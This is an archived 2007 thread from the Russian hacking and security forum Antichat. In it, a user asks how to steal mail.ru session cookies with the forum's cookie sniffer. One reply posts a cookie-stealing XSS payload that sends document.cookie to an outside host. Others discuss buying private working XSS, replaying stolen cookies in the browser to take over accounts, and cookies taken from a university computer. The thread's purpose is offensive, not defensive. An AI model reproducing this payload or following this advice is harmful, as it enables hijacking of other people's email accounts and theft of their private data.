HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Снифер античата и mail.ru
  #1  
Старый 21.05.2007, 23:00
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295

Репутация: 3
Отправить сообщение для cigaretteburn с помощью ICQ
По умолчанию Снифер античата и mail.ru

Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
 
Ответить с цитированием

  #2  
Старый 21.05.2007, 23:06
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Для этого тебе нужна XSS на mail.ru
 
Ответить с цитированием

  #3  
Старый 21.05.2007, 23:15
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от ice1k  
Для этого тебе нужна XSS на mail.ru

Если просматривать письмо через Ж то можно украсть сессию. Только как нужно его просматривать я не знаю =(
 
Ответить с цитированием

  #4  
Старый 22.05.2007, 00:54
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295

Репутация: 3
Отправить сообщение для cigaretteburn с помощью ICQ
По умолчанию

Цитата:
Сообщение от ice1k  
Для этого тебе нужна XSS на mail.ru
ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа?
 
Ответить с цитированием

  #5  
Старый 22.05.2007, 01:14
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию

Цитата:
Сообщение от cigaretteburn  
ну точто нужна XSS это понятно, а кто может дать именно код XSS работающий для использования снифа?
просто код вот:
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $
 
Ответить с цитированием

  #6  
Старый 22.05.2007, 02:37
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295

Репутация: 3
Отправить сообщение для cigaretteburn с помощью ICQ
По умолчанию

Цитата:
Сообщение от nc.STRIEM  
просто код вот:
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $
Вот именно что обычный код не пройдёт, система его забанит, вот и создал эту тему чтоб узнать рабочий код XSS под сниф для mail.ru естественно не за деньги.. за деньги можно всё купить.. а вот чтоб своими мозгам.. у меня покачто мозгов для этого нехватает видимо, поэтому и спрашиваю у людей. ))
 
Ответить с цитированием

  #7  
Старый 21.05.2007, 23:16
Naf
Новичок
Регистрация: 19.05.2007
Сообщений: 11
Провел на форуме:
30549

Репутация: 11
По умолчанию

а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
 
Ответить с цитированием

  #8  
Старый 22.05.2007, 00:50
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295

Репутация: 3
Отправить сообщение для cigaretteburn с помощью ICQ
По умолчанию

Цитата:
Сообщение от Naf  
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
Как это толку? в опере меняеш куки и всё..
 
Ответить с цитированием

  #9  
Старый 25.05.2007, 18:06
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Цитата:
Сообщение от cigaretteburn  
Как это толку? в опере меняеш куки и всё..
На мэйле привязка к IP адресу идет...
 
Ответить с цитированием

  #10  
Старый 02.06.2007, 22:00
MadFun.
Участник форума
Регистрация: 08.05.2007
Сообщений: 100
Провел на форуме:
454835

Репутация: 28
По умолчанию

Цитата:
Сообщение от Naf  
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
Конечно толку не будет если ты их не попробуешь в свой браузер вбить куки.А может случиться великое чудо ? %) и появиться надпись здраствуйте такой такой то ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
сниффер АНТИЧАТА Black_Death Болталка 2 17.05.2007 19:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ